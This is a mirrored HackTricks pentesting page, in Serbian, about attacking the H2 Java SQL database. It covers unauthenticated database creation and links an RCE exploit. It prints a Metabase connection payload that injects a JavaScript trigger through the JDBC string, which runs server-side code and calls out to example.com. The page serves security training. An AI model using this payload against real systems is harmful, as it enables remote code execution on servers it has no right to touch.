Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 13:13:41 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/pentesting-web/h2-java-sql-database.md

3.7 KiB
Raw Blame History

H2 - Java SQL baza podataka

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Zvanična stranica: https://www.h2database.com/html/main.html

Pristup

Možete navesti ne postojeci naziv baze podataka kako biste kreirali novu bazu podataka bez validnih akreditacija (neautentifikovano):

Ili ako znate da na primer radi mysql i znate naziv baze podataka i akreditacije za tu bazu podataka, možete jednostavno pristupiti:

Triks iz kutije Hawk sa HTB-a.

RCE

Imajući pristup komunikaciji sa H2 bazom podataka, proverite ovaj eksploit za dobijanje RCE na njoj: https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed

H2 SQL Injection do RCE

U ovom postu je objašnjen payload za dobijanje RCE putem H2 baze podataka zloupotrebom SQL Injection-a.

[...]
"details":
{
"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER IAMPWNED BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\nnew java.net.URL('https://example.com/pwn134').openConnection().getContentLength()\n$$--=x\\;",
"advanced-options": false,
"ssl": true
},
[...]
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u: